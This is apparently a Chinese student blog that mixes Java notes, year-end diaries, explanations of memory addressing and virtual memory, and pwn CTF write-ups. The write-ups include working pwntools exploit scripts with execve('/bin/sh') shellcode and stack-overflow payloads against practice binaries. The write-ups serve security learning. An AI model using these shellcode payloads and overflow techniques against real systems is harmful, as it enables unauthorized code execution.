do something with value;
}
}

数组

数组拷贝：将一个数组变量拷贝给另一个数组变量，这两个变量引用同一个数组；若是希望拷贝一个数组到新的数组，则需要使用Arrays类的copyOf方法。
命令行参数args：在Java应用程序的main方法中，程序名并没有存储在args数组中，例如
1
java Mesage -h world
args[0]是“-h”，而不是java或Message

类与对象

更改器方法：能修改对象的方法
访问器方法：只访问对象而不修改对象的方法
Java文件名必须与public类的名字相匹配。在源文件中，只能有一个公有类，但可以有任意数目的非公有类
构造器总是伴随new操作符一起使用：new Employee("James", ...)
Java中，所有方法必须在类的内部定义
不要返回引用可变对象的访问器方法，如果需要返回一个可变对象的引用，应该首先对其进行克隆
类的方法可以访问类的人一个对象的私有域
Java可以直接初始化类的实例域
（this）调用另一个构造器：构造器的第一个语句形如this(...)，这个构造器将调用同一类的另一个构造器
初始化块：在一个类的声明中，可以包含多个代码块。只要构造类的对象，这些块就会被执行
Java不支持析构器
instanceof：双目运算符，用来测试一个对象是否为一个类的实例，eg：boolean result = obj instanceof Class

继承

Java中所有继承都是公有继承
Java使用关键字super调用超类方法，也可以实现对超类构造器的调用。
阻止继承：使用final类和方法
Object class：默认为所有类的超类（根类）
Object.equals(a, b)：防备私有数据成员可能为为NULL的情况，若两个参数都是NULL则返回true；其中一个参数为NULL则返回false；两个都不为NULL则调用ａ.equals(b)
ArrayList：类似于C++的vector，但不能使用[]去访问数组列表中的元素，add新增、set修改、get访问
可变参数数量：使用...

接口、lambda表达式、内部类

接口没有实例

日后看情况补充

怜时|品世|悟宇

2020-12-31T05:46:30.000Z

当下

14:00/31/12/2020，晴，宿舍

2020

前几天预约显卡，看到1.1日零点开售，还觉得离预售怎么还有这么久。可放下手机突然反应过来，原来2021离我已经没几天了啊。

“2020年，我所居住的星球被评为全太阳系最魔幻星球……”是的，今年，对于我们所有人来说，都称得上魔幻的一年了吧。在我仍浸在这2020时光之时，时间却永不停息地，如永不损坏的精密机械，运行到了2021。直到今天，我甚至都还不觉得2020原来只有几个小时的时间就过去了，但没办法，已经31日了呢，从去年开始升起的写年终总结的奇怪的仪式感，又在心中作祟了。那就让这篇总结，带我褪去2020的时光，准备穿上2021的新袍。

2020的一月，是两种颜色。回到成都，和老友们聚在一起吃了几顿饭，游了几次周边，聊天聊地聊未来，友情就像一坛酒，需要靠时间慢慢酝酿，越品越香。这时的一月，是享受的颜色。但这人生在世啊，十有八九不尽人意，突如其来的疫情，彻底阻碍了我们进一步的出游计划，家家门户紧闭，即将到来的新年似乎也增添了许多谨慎和防护。疫情之后的一月，除了每天早上关注新增人数，似乎也就回忆不起其他什么事情了。这时的一月，就像每日不断增长的感染数字一样，是冷酷的颜色。

二月，随着疫情的加重，学校决定延迟开学，并且在网络授课。一开始听到这个消息，我的内心是激动的：芜湖！谁不想在家多待待，好吃好喝。那时的我也许怎么也想不到这学期都来不了学校了……不过毕竟还是大三下学期了，保研的压力也渐渐增加，开始不断地刷CSP，提升自己，同时也自觉地用功学习了。但偶尔闲下来时，却总感觉到莫名的紧张和迷惘。也许是我不够自信，也许看到大家都已经开始准备考研而我还在为不知能不能取得的保研名额死磕专业课程，那段时间我在知乎等各大网站，查找保研失利的事情，纠结着要不要保研考研两手准备。但最后，也许是我这个人比较适合单线程吧，毅然放弃了两手准备，抱着今年保不上，来年再去考的念头，全力去冲保研了。现在想想，也许只有破釜沉舟，才能有一往无前的勇气吧。

三月，依旧是每年都值得纪念的日子，而且2020年的3月，对于大学以来的我，更加特殊。这是上大学以来，第一次在家过生日。这次生日，奖励了自己一把静电容键盘，这把键盘，也许未来就是会陪伴我很久的朋友了吧。爸妈在家也为我准备了丰富的午餐，突然有些感谢这次疫情，能让我再一次在家由父母为我祝生。也许越长大就越变得感性吧，人生在世就如佛学所说人生如渡劫，走着走着，就越来越孤独，以后陪伴父母的时间也许就越来越少了吧，这也许就是每个人必然要渡过的一劫吧。只希望未来的我，能平衡好生活，有时间多陪陪父母吧。

到了四、五月，成都的疫情开始有所缓解，我也终于走出了房门，和爸妈去了趟都江堰，和朋友吃了次烤肉，活动活动关了两个多月的筋骨。这次疫情也让我深刻体会到旅游和美食的珍贵（笑）。

6月开始到8月初，这是为了保研而奋战的三个月，努力了一学期的我，迎来了期末考试。虽然线上考试带来了许多的不便，但最终还是比较完美的取得了令我满意的成绩，也许这就是努力终有收获吧。考完试之后，也还不能放松，在七月这一整个月，为了参加夏令营，准备各种材料和面试，在家对着镜子和录音机，一遍一遍的练习，同时复习着以前所学的知识。在这期间，突然发现原来这三年里，以前认为没啥重要的课程论文，原来是如此有用，它体现着我视野的广度，能让我面对老师的提问侃侃而谈。终于，有幸取得了夏令营的预推免名额，离保研的目标近了一大步。可以说这是我今年最高兴的一件事吧。

到了8月，学校通知中旬开学，本想着还有10多天，终于可以和朋友们开展旅游计划了，然而天公再次作妖，整个八月上中旬，成都周边全在下雨，实在是……让我相当不爽（气）。回到学校，CSP也将在9月开展，于是又投身到最后这一次CSP提分的机会中了，每天开始机械化的昨天做题刷题。另外参加的一个比赛也要结题答辩了，于是时间又变得紧张起来。

9月的日子里，主旋律就是CSP和比赛了。所幸最终CSP分数有所提升，比赛说来惭愧，太菜了只能勉强算个三等奖吧（尴尬）。９月下旬对我来说就是煎熬吧，校内保研名额月底公布，公布前的日子里，甚至没晚的睡眠都不够了，这就是越期望的就越害怕得不到而焦虑的心理吧。最终名额下来后，我十分庆幸这一年里，我付出了比前两年更多的努力，没有松懈吧。这也算完成了去年年终总结定下的最大目标吧。终于，可以放松放松，体验大学生活的另一面了！

后面这几个月里，我经常一个人抱着相机，去逛南京，去记录生活、品味生活。一个人的短途旅行，可以静下心来思考未来，可以关注到平常忽略的风景，可以走走停停，将自己交给自己，凭心指引。这也许就是我所向往的未来生活一部分吧。

未来

最近陪松扬踩点考研考场，在吃饭和散步的时候又聊到了未来。未来总是青年人永恒的话题，我们在每日的生活中不断探究，不断领悟，慢慢形成或改变对未来的看法。简单来说，未来，我和松扬有着相似的看法：工作上努力工作，获取财富，生活上能有一定自由，能和我爱的人爱我的人健健康康幸幸福福的品味生活。似乎随着年龄的增长，就觉得时间越过越快，因此希望能够更加“怜时”，把时间用在刀刃上；随着升学和工作，就将步入社会，我希望无论遇到什么，我能够以体验者的身份，去“品世”。尝遍人生百味，等到中年老年，希望能从着百味人生中，“悟宇”，感悟到一点人生吧。

当然，最近的未来目标，就是完美的完成毕设，踏入更高的学府，为了心中的未来努力吧！希望来年洗尽铅华，2021，你好！

Logical Address?Linear Address?Virtual Address?

2020-05-22T02:59:09.000Z

最近在理解计算机内存管理的时候，又看到了这三个名词，当初在学计算机组成原理的时候就有点绕，现在重新来理解，发现网上很多blog说法都不一致，于是重新翻阅《深入理解计算机系统》、《计算机系统基础》以及Intel IA-32手册，发现还是有说的不甚清晰的地方，于是和老师以及同好讨论，最终得出了一个比较合理的概念区分。

先说结论：虚拟地址（虚地址，Virtual Address）在不同的情境下代表不同的意思：

在段页式存储中，虚地址既可以指作线性地址（Linear Address），也可以指做逻辑地址
在页式存储和段式存储中，虚地址指作逻辑地址（Logical Address）
因此，为了不引起混淆，建议尽量不使用虚拟地址，其本身就是一个比较笼统模糊的概念，感觉就是相对物理地址而言的一个称呼。
在本文，规定三个意义明确的地址：逻辑地址、线性地址、物理地址，方便后续解释。

物理地址

CPU地址总线传来的地址，由硬件电路控制。

逻辑地址

由程序中或者指令中给出的访内地址。

线性地址

在段页式存储中，才有线性地址这个概念。是逻辑地址转化到物理地址的中间产物。

在段式存储中，逻辑地址经过段式管理部件，将其映射为一个线性地址，此时这个线性地址就是物理地址；
若是在段页式存储中，逻辑地址经过段式管理部件，先被映射为线性地址，然后线性地址通过页式管理部件，被映射成物理地址。

虚拟地址

在讨论虚拟地址到底是什么之前，我们先来看三种方式下的地址转换：

段式

页式

段页式

以上图片来源于《计算机系统基础》和《计算机系统结构》，由图我们可以看出，无论是什么模式下，逻辑地址都可以被称之为虚拟地址（VA），然后由于线性地址其实是一个逻辑地址到物理地址变化的中间产物，可以把线性地址理解为页式存储中的逻辑地址，因此很多说法中，线性地址也被叫做虚地址。

总结

总的来说，虚地址就是一个笼统的概念，以后遇到了就按情况理解，自己能够分清楚到底是在讲逻辑地址还是线性地址就好，个人倾向于不用虚拟地址这个概念（笑）。

Virtual Memory

2020-05-22T01:24:31.000Z

对虚拟存储器管理方式和Cache的知识需要了解逻辑地址、线性地址、物理地址的相关概念，若不清楚详见Logical Address?Linear Address?Virtual Address?

虚拟存储器

虚拟存储器通过增设地址映像机构来实现程序在主存中的定位。将程序分割成若干个段或页，用相应的映像表指明该程序的某段或某页是否已装入主存。若已装入，同时指明其在主存中的起始地址；若未装入，就去辅存（磁盘）中调段或页，将其装入主存后再在映像表中建立好程序空间和实存空间的地址映像关系。
程序执行时先查映像表，将程序（虚）地址变成实（主存）地址后再访问。

段式管理

原理：程序是模块化的，一个程序总可以分解为多个在逻辑上相对独立的模块，每一个模块就是单独的一个段，段的起点以0相对编址。当某个段由辅存调入主存，系统赋予该段一个基址，由基址+单元在段内的相对位移就可以形成主存中的实际地址。主存是按段分配的存储管理方式。

段表：每个在主存中的程序都有一个段（映像表）表来存放该程序各段在主存中的状况。段表本身也是一个段，一般在主存，也可以在辅存，需要时再调入主存。

段表项：段表中每一项（行），描述该道程序一个段的基本情况。

段表基址寄存器：主存中有N道程序，可设N个段表寄存器。对于每个程序，由基号（程序号）指出使用哪一个段表基址寄存器，然后段表基址寄存器中的段表基址字段指向程序在主存的起始地址，段表长度字段指明该程序所用段表的行（段）数。

段式管理的地址转换过程如下图：

对图中一些信息做一点解释：

图示的段表基址寄存器，是由N个段表基址寄存器构成，每一行都是一个寄存器。
图示的段表，其段名若就是程序每个段的序号，则可以省略。
图示的段表中装入位为1表示已装入主存，访问方式在一般情况下，为空也不能省略。
由图可知，段式管理下，虚地址被分为三各部分：基号（程序号），段号，段内位移
由图可知段式管理的地址转化流程为：虚地址->段基址寄存器->段表-(段起始地址+虚地址中段内位移)->主存地址。

页式管理

原理：把主存和程序空间都机械的分成固定大小的页，按页顺序编号。这样主存地址就由实页号np和页内位移nr两个字段组成。（划重点，待会会将其与段式管理比较）

页表、页表项、页表基址寄存器类比段式管理

页式管理的地址转换过程（最基础的一种）如下图：

下面对该图进行一些解释：

在页表中，因为页式存储中程序的起点必处于一个页面的起点，用户程序中每一个虚地址就由虚拟页号N’v字段和页内位移Nr字段组成。
虚存和主存的页面大小一致，因此页表中只需记录虚拟页号N’v和主存页号nv的对应关系，不用保存页内位移。而且虚页号与页表行号对应，页表中不需要专门的虚页号字段。
因为虚地址中的页内位移就是实地址中的页内位移，因此页式管理只需要将主存实页号与页内位移拼起来就得到了主存地址。（回到刚刚划重点的地方，因为主存地址就由这两个字段组成，因此拼接起来就是主存地址了；而段式管理中，是通过基址+段内偏移的运算，计算出主存地址。）
由页式和段式的图可以看出，段式管理实际上用了两个加法器，而页式只用了一个，这也是页式比段式存储更快一点的原因。
同样，页表也存在于主存中。

地址的映像和变换

虚存一般比实际主存空间大很多，即N'v > nv，因此虚地址空间映射到实地址空间必然会进行压缩，其示意图如下：

而且，页式存储器一般都采用全相联映像：让每一道程序的任何虚页可以映射到任何实页位置，如下图所示：

由于主存中装入位为1的行最多只有2^nv行，使得页表中绝大部分实页号字段和其他字段都成为无用的空间，大大降低了页表空间的利用率，因此，有两种方式来提高页表的空间利用率。

该方法是把页表压缩成只存放已装入主存的虚页，如图：

需要注意的是，该表与上面的页表有所不同，该表是通过虚地址的基号字段和用户虚页号一起，去相联比较页表中是否有满足的项。（而普通的是通过页表基地址+用户虚页号直接得到表中位置）。但该方式查表速度慢，造价较贵，一般不使用目录表来存储全部虚页号和实页号的对应关系，但它可以用来提高地址变换速度。

辅存实地址

将页表中装入位为0的行用实页号字段存放该程序此虚页在辅存中的实地址，以便掉页时实现用户虚页号到辅存实地址的变换。这种方法在辅存实地址位数与用户虚页号位数相差太大时就很难利用。

页面替换算法

当主存装满时，这时又有新的指令或数据（不在主存），这是页面就会失效，需要从辅存中调页替换。

随机算法（RAND）：采用软或硬件随机数产生器产生要被替换页的页号
先进先出算法（FIFO）：选择最早装入主存的页作为被替换页
近期最少使用算法（LRU）：选择近期最少访问的页作为被替换页

主存页面表：每一行用于记录主存中各页的使用情况，该表整个系统只有一个。注意：不是页表！不是页表！不是页表！

页式虚拟存储器工作全过程

快表（TLB）

为了减少访存次数，往往把页表中最活跃的几个页表项复制到高速缓存中，这种在高速缓存中的页表项组成的页表就称位快表。这样，在地址转换中，同时查页表和快表，若在快表中查到，则停止查找页表；若快表中没有查到，则在页表中查，查到后访存并将此虚页号与实页号的对应关系送入快表。这里也需要用替换算法替换快表中已不用的内容。

快表其实可以看成一个目录表，其与慢表（页表）的内部地址变换如下图：

为了提高快表的命中率和查表速度，可以用散列方法实现按内容查找，然后找到对应表项还需要与虚页号Nv对比，一致则形成nv继续后续操作，否则出现了散列冲突，得去慢表中查找。

在IBM370/168中，为了减少散列冲突，快表中每个地址单元中存放多对虚页号与实页号的映像关系，用两套相等电路比较，只有都不相符，才是不命中，再去慢表中获得nv。另外，该虚拟存储器的页表基址寄存器是一个相联寄存器，其行数并不是计算机允许的最大用户数，而是计算机上同时运行的用户的最大个数（比如最多允许2^24个用户，但实际同时存在的用户最多只有六个）。这样大大减少了查询时间，使获取nv更快。

两级页表和多级页表

一级页表所占内存连续空间太大，因此，提出了两级页表甚至多级页表的概念。

两级页表分为页目录表和页表，页目录表中每一行称为页目录项，用于记录每一个页表所在的内存的初始位置；页表中的页表项，则和一级页表一样，用于记录nv等信息。这时候，页表就相当于被离散化，就能够提高内存空间利用率。

段页式管理

原理：把主存等分为固定的页，程序按模块分段，每个段又分成与主存页面大小相同的页。每到程序通过一个段表和相应的一组页表定位。

段页式管理的定位映像机构及其地址的变化过程如下图：

其中通过段表得到的就是线性地址，然后线性地址经过页式管理变为主存地址。

忙里偷闲乐悄生

2019-12-31T13:55:18.000Z

当下

还有几个小时就是新的一年了。现在是8:30/31/12/2019，位于南京航空航天大学图书馆。

2019

今晚学校里又是一度元旦晚会，而去年的元旦晚会的场景，似乎还历历在目：和松扬在学校散步闲谈，到篝火晚会前看演出、玩游戏、写春联、猜灯谜。2019年就这样拉开了帷幕。

时光如白驹过隙，今年的元旦晚会，想必也是热闹非凡吧，只是少了去欣赏的念头，只是在图书馆复习之余，兴许是所谓的仪式感作祟，突然就想来写一写年终总结了。那么就随想随写，回顾一下这即将逝去的一年，展望下未来的生活吧。

记忆中的2019的1月，似乎已经没有什么存在感了，只记得放寒假那天，终于回到了家，和爸妈在外面吃了一顿大餐。然后在寒假之余，似乎也没有做出什么可以刻在记忆之玉上的事情。寒假就这样淡淡的，如同冬日成都的天空，灰灰白白的，流逝过去了。

那么就到了3月。3月是一个特殊的月份，因为在这31天里，有一天是我的生日。我这个人啊，从小也没怎么在乎过生日，生日是一天，其他的日子也是永恒不变的24小时罢了。不过今年的生日，是我20岁的生日，在这一天，我拿着父母送我的生日礼物—一枚单反相机，独自在学校闲逛了一下午。最后坐在樱花树下，在穿插满淡粉色樱花瓣的草地上，享受着大学生活的安静悠闲的一面。也许是那时，一种仪式感，总是在我忙碌的时候时悄悄冒出来，想着闲下来应该做些什么有意思的事情吧。

3月之后，就是大学生活的另一面了：信息安全的大二下，真的是魔鬼的一学期。从四月到七月，计组实验始终贯穿着我的日常生活。生活开始规律性的由忙变到很忙再到超级忙，其他事情也想的比较少了。不过忙碌中有结果，计组这门课，真的是学到了不少东西。总的来说，在大二下学期，有收获也有遗憾，有无助和绝望，也有努力终有成的欣喜。也是在这学期，常常因为计组实验做的不完美，而肝到3、4点。这也许是我第一次为了做好一个东西这么肝吧。

然后到了7月，学校的考试在7月初就结束了，于是 ~~令人兴奋的暑假就来了~~ 暑期实训就来了。其实这个实训学到的东西挺多挺杂的，还记得在临近答辩前的几个晚上，又因为想做到更好而肝到4、5点。不过在实训最后的答辩上，还是有所成，拿了个三等奖，获得了600元的图书卡。不过让我感受深刻的，还是第一次有了团队合作的感觉。

在暑假，了解了下保研的事项，感觉到自己还差了好多，在很多方面，还需要努力。我也渐渐有了紧张感，到了这学期，在课程的学习上更加的认真了，当下的目标也渐渐明晰，就是取得保研资格。不过这学期，9月份还是太松懈，CSP没有报上名，少了一次考试的机会。然而在12月的CSP考试中，又因为时间太紧，没怎么练习，依旧没有取得理想的成绩。目前就只剩下明年3月的考试了。这次，一定要准备万全，破釜成舟，全心放到练习上，提高自己的编程能力吧。

未来

这一年，暂时能想起来之事，也就这么多了。那么再聊聊未来吧。

在12月的某一个晚上，从自习室出来，独自走在路上，不知怎的，就想到了未来。我想要的未来是什么样子呢？我想要的未来，早已不是幼时那些远大的梦想了。我所期望的未来，其实也就是下面这些样子了：在该努力工作的时候努力工作，为了能去拍摄满天繁星的湖边；能去徒步如Hornstrandir一样宁静而美丽的小岛；能和老朋友们闲时聚会畅谈；能和心爱之人在一个温馨的小房，一起看着孩子慢慢成长。在忙里偷闲，在闲里乐享。

当然，回到现实，最近的目标就是CSP300分以上和保研资格了，2019年，再见！2020年，加油！

pwn_shellcode

2019-09-24T15:03:45.000Z

Command Line

放入IDA分析伪代码：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+0h] [rbp-10h]

  printf("0x%lx\n", &v4, envp);
  __isoc99_scanf("%s", &v4);
  return 0;
}

可以知道该程序输出了v4的地址，然后我们使用checksec查看程序是否存在RWX段：

发现是存在RWX段的，然后在IDA中调试程序，使用Ctrl+s，查看printf打印出地址，发现地址所在栈是RWX的。因此很容易想到直接栈溢出然后劫持RIP，运行一段shellcode即可。因为v4距离RBP差16字节，所以返回地址（shellcode在栈中的地址）为程序打印出来的地址加上32（插入shellcode）字节的位置。exp如下：

from pwn import *

io = process('./pwn1')

shellcode_addr = int(io.recv()[:-1],16)+0x20
shellcode = '\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'

payload = '\x90'*24+p64(shellcode_addr)+shellcode

io.sendline(payload)

io.interactive()

apprentice_www

首先checksec查看这个文件，发现没有RWX段。放入IDA，分析伪代码：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  alarm(0x1Eu);
  setup(main);
  return butterflySwag();
}

main函数里面很简单，调用了alarm函数反调试，同时调用了setup和butterflySwag函数。然后查看这两个函数

//setup()
int __cdecl setup(int a1)
{
  int result; // eax
  signed int i; // [esp+18h] [ebp-10h]

  for ( i = 0; i <= 2; ++i )
    result = mprotect((void *)((i << 12) + (a1 & 0x8048000)), 0x1000u, 7);
  return result;
}

看到setup函数后，发现调用了mprotect函数，setup函数的作用就是将0x8048000~0x804a000段都改为RWX段。于是有一个模糊思路，就是栈溢出劫持eip然后在RWX段上执行shellcode。

int butterflySwag()
{
  _BYTE *v1; // [esp+18h] [ebp-10h]
  unsigned int v2; // [esp+1Ch] [ebp-Ch]

  __isoc99_scanf((const char *)&unk_8048730, &v1);
  __isoc99_scanf((const char *)&unk_8048733, &v2);
  v2 = (unsigned __int8)v2;
  *v1 = v2;
  if ( v2 )
  {
    if ( v2 == 1 )
    {
      puts("All truly great thoughts are conceived by walking.");
    }
    else if ( v2 > 4 )
    {
      if ( v2 > 9 )
        puts("When you look into an abyss, the abyss also looks into you.");
      else
        puts("He who has a why to live can bear almost any how.");
    }
    else
    {
      puts("Without music, life would be a mistake.");
    }
  }
  else
  {
    puts("That which does not kill us makes us stronger.");
  }
  return 0;
}

可以看到v1所在地址被1字节的v2赋值，为了分析的更清晰，于是查看其汇编代码：

分析到080485D2处的时候，我们可以看到该处dl寄存器的值赋值给了eax所存储的地址处。其中edx的值是v2，eax的值是v1。那么我们想到，可以利用这段代码，将想要修改的地址修改成我们想要的东西。如果要输入一段shellcode，我们可以使用scanf来进行输入，所以我们注意到080485D9处的jnz指令，只要合理修改jnz的操作数，就可以直接跳到0804859D也就是第一个scanf前，然后输入shellcode。因为jnz的操作数是8位带符号数，所以我们计算出080485D9-0804859D = ffc2，所以只需要将jnz指令后的操作数改为c2就可以了。然后因为分析代码可知，我们将v1用来存储地址，v2用来存放将会在地址上赋值的内容。所以shellcode只能每次输入一个字节。所以需要不断跳到scanf直到输入完整的shellcode。然后再修改jnz指令，跑完程序。exp如下：

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch = 'i386', os = 'linux', timeout = 1)
io = remote('172.17.0.2', 10001)

patch_jne_address = 0x080485da#jnz loc_80485E9所在地址，修改jnz后的操作数
shellcode_address = 0x080485db#shellcode放置的地址

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
#xor eax, eax
#push eax
#push 68732F2Fh
#push 6E69622Fh
#mov ebx, esp
#push eax
#push ebx
#mov ecx, esp
#mov al, 0Bh
#int 80h

io.sendline(str(patch_jne_address))
io.sendline(str(0xc2))#将jnz loc_80485E9改成jnz loc_804859D，重复执行两个call __isoc99_scanf读取shellcode

for i in xrange(len(shellcode)):#逐字节写入shellcode到jnz loc_80485E9指令后面
io.sendline(str(shellcode_address+i))
io.sendline(str(ord(shellcode[i])))

io.sendline(str(patch_jne_address))
io.sendline(str(0x00))#写完shellcode后改为jnz loc_80485DB，执行shellcode

io.recv()#把垃圾数据读走

io.interactive()

pwn_stack

2019-08-27T03:13:10.000Z

Doubly Dangerous

扔进IDA，F5查看伪代码，我们看到main函数里有两个变量，一个数组和一个单精度浮点数，一个gets函数。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+Ch] [ebp-4Ch]
  float v5; // [esp+4Ch] [ebp-Ch]

  v5 = 0.0;
  puts("Give me a string: ");
  gets(&s);
  if ( 11.28125 == v5 )
  {
    puts("Success! Here is your flag:");
    give_flag();
  }
  else
  {
    puts("nope!");
  }
  return 0;
}

分析代码易知当v5等于11.28125时，就会调用give_flag函数，然后得到flag。于是我们的思路就是通过gets函数，使数组s的值覆盖掉v5的值，使v5等于11.28125。
那么通过IDA远程调试，断点就设置在main函数即可，然后单步调试，观察栈中的情况，我们发现v5最开始被赋值为零，记录下v5在栈中的位置：

继续执行，找到数组s在栈中的位置：

我们要做的，就是在s中填充适当字符，覆盖掉v5为我们想要的。于是这两个栈中的地址相减，得到两者相距64个字节，那么就需要64个字节的字符填充，然后后4字节覆盖v5成11.28125。由计算机组成原理的知识，32位系统，小端，float型数据，得到11.28125的机器码为0x41348000，于是构造payload：64*'a'+'\x00\x80\x34\x41'

通过pwntools最终得到flag:

Quals-Warmup

扔进IDA，查看伪代码

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  char s; // [rsp+0h] [rbp-80h]
  char v5; // [rsp+40h] [rbp-40h]

  write(1, "-Warm Up-\n", 0xAuLL);
  write(1, "WOW:", 4uLL);
  sprintf(&s, "%p\n", sub_40060D);
  write(1, &s, 9uLL);
  write(1, ">", 1uLL);
  return gets(&v5, ">");
}

查看sub_40060D

int sub_40060D()
{
  return system("cat flag.txt");
}

分析代码可知，这个程序其实运行的时候，就已经把得到flag的函数地址打印出来了，所以要做的就是栈溢出，使返回值变为sub_40060D。然后查看v5在栈中的位置，使RBP-40H，所以保存的返回地址的起始在栈中的地址为RBP-40H-8H(RBP旧值)-8H，那么payload构造为payload = 72*'a'+p64(0x40060d)即可。通过pwntools得到flag:

sCTF 2016 q1-pwn1

扔进IDA，分析伪代码，发现main函数很简单，只调用了一个vuln函数，进入这个函数分析：

int vuln()
{
  int v0; // ST08_4
  const char *v1; // eax
  char s; // [esp+1Ch] [ebp-3Ch]
  char v4; // [esp+3Ch] [ebp-1Ch]
  char v5; // [esp+40h] [ebp-18h]
  char v6; // [esp+47h] [ebp-11h]
  char v7; // [esp+48h] [ebp-10h]
  char v8; // [esp+4Fh] [ebp-9h]

  printf("Tell me something about yourself: ");
  fgets(&s, 32, edata);
  std::string::operator=(&input, &s);
  std::allocator<char>::allocator(&v6);
  std::string::string(&v5, "you", &v6);
  std::allocator<char>::allocator(&v8);
  std::string::string(&v7, "I", &v8);
  replace((std::string *)&v4, (std::string *)&input, (std::string *)&v7);
  std::string::operator=(&input, &v4, v0, &v5);
  std::string::~string((std::string *)&v4);
  std::string::~string((std::string *)&v7);
  std::allocator<char>::~allocator(&v8);
  std::string::~string((std::string *)&v5);
  std::allocator<char>::~allocator(&v6);
  v1 = (const char *)std::string::c_str((std::string *)&input);
  strcpy(&s, v1);
  return printf("So, %s\n", &s);
}

分析代码加上运行这个程序，可以知道是返回输入，然后看代码中v5是you，v7是I，然后有个replace函数，猜测是将输入中的I全部替换为you，测试一下，发现确实是。然后看输入的s，距离ebp有3C，然而fgets允许输入的最长字符串为32，所以不可能通过直接输入导致栈溢出。我们看到代码的最后，有个strcpy函数，分析可知，是将替换后的字符串给了v1，然后将v1拷贝到s中，于是乎，我们的目标就是通过替换后的字符串，使栈溢出。所以我们需要输入21个I，然后再任意输入一个字符作为payload的占位部分，然后加上get_flag的地址。exp如下：

from pwntools import *

io = process('./pwn1')

io.recv()

payload = 'I'*21+'a'+p32(0x08048f0d)

io.sendline(payload)

print io.recv()

just_do_it

扔入IDA中，分析代码：

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+8h] [ebp-20h]
  FILE *stream; // [esp+18h] [ebp-10h]
  char *v6; // [esp+1Ch] [ebp-Ch]

  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 2, 0);
  v6 = failed_message;
  stream = fopen("flag.txt", "r");
  if ( !stream )
  {
    perror("file open error.\n");
    exit(0);
  }
  if ( !fgets(flag, 48, stream) )
  {
    perror("file read error.\n");
    exit(0);
  }
  puts("Welcome my secret service. Do you know the password?");
  puts("Input the password.");
  if ( !fgets(&s, 32, stdin) )
  {
    perror("input error.\n");
    exit(0);
  }
  if ( !strcmp(&s, PASSWORD) )
    v6 = success_message;
  puts(v6);
  return 0;
}

发现代码是让你输入密码，查看success_message，发现就是一个输入成功的字符串，而不是flag。从代码中可以看到，代码使用fgets读取flag，保存到全局变量flag中。我们输入是在s，但是s距离ebp有20H，而fgets只允许有32个字符的输入，明显不能直接栈溢出。于是继续分析。我们发现最终输出了v6，v6距离s只有20个字符，于是我们可以覆盖v6为flag的地址，通过puts打印出flag。exp如下:

from pwntools import *

io = process('./just_do_it')

io.recv()

payload = 'a'*20 + p32(0x0804A080)

io.sendline(payload)

io.recv()

pwn environment

2019-08-25T08:14:26.000Z

国内网上关于pwn的知识零零散散，pwn门槛高、难入门，而且关于pwn环境的搭建以及IDA的使用更是没有系统的教程，或者是教程老旧过时。此次环境搭建，基于虚拟机上的Ubuntu18.04的32位和64位系统、pwntools，与Windows上的IDA7.0进行远程调试，是根据i春秋Linux pwn入门教程系列进行环境的配置和补漏。这期间踩了许多坑，原本尝试在docker上使用32位和64位系统来进行远程调试，但是IDA远程时出现：The file can‘t be loaded by the debugger plugin，尝试了许多解决方案，未能解决，于是只能使用两个虚拟环境来搭建，如果有大佬知道如何解决，请不吝赐教，感谢！

IDA远程调试配置

在IDA所在的文件夹的dbgsrv文件夹下找到需要的调试服务器linux_server(32位)和linux_serverx64(64位)并复制到Ubuntu主目录中。如果没有可执行权限，则需要给这两个文件赋予可执行权限：

1 2	chmod 777 ./linux_server chmod 777 ./linux_serverx64

然后执行命令：

1	./linux_server

此时我们可以看到Linux_server的版本为1.22、正在监听23946端口。

接着打开32位的ida，载入heapTest_x86，在左侧的Functions window中找到main函数，随便挑一行代码按F2下一个断点。在Debugger中选择Remote Linux debugger，然后通过Debugger->Process options...打开选项窗口设置远程调试选项。Hostname就是Ubuntu的ip地址：

密码就是Ubuntu的密码，填写完成后点击OK，按F9快捷键运行程序。若连接正常可能提示Input file is missing:xxxxx，一路OK就行，IDA会将被调试的文件复制到服务器所在目录下，然后汇编代码所在窗口背景会变成浅蓝色并且窗口布局发生变化。

F8：单步跨入函数，F7：单步不跨入函数，F4：运行到指定位置。随着程序的调试执行，我们可以看到运行调试服务器的shell窗口会显示出新的内容：

使用pwntools和IDA调试程序

首先我们需要安装pwntools：

1	sudo pip install pwntools

其官方文档地址：<http://docs.pwntools.com/en/stable/ >

将heapTest_x86导入到Ubuntu主目录中，然后执行命令：

1	socat tcp-listen:10001,reuseaddr,fork EXEC:./heapTest_x86,pty,raw,echo=0

将heapTest_x86的IO转发到10001端口上。

然后运行python，使用from pwn import *导入pwntools库。然后使用io = remote("192.168.112.134", 10001)与heapTest_x86连接。这个时候我们返回到IDA中设置断点。需要注意的是此时heapTest_x86已经开始运行，我们的目标是附加到其运行的进程上，所以我们需要把断点设置在call ___isoc99_scanf等等待输入的指令运行顺序之后，否则由于计算机的运行速度，我们的断点将会因为已经目标指令已经执行完而失效，达不到断下来的效果。

选择Debugger->Attach to process...，附加到./heapTest_x86的进程上

然后IDA进入到调试模式。

这几行指令实际上是执行完sys_read后的指令，此处我们不需要关心它，直接按F9，选中标志会消失。回到python窗口，我们使用pwntools的recv/send函数族来与运行中的heapTest_x86进行交互。首先输入io.recv()，我们发现原先会在shell窗口出现的菜单被读出到python窗口里了。

然后使用io.sendline('1')选择1，然后回到IDA，我们就发现到了断点处了。

当我们希望结束调试时，应该使用io.close()关闭掉这个io。否则下一次试图attach时会发现有两个./heapTest_x86进程。在IDA中按Ctrl+F2即可退出调试模式。

疑难解答

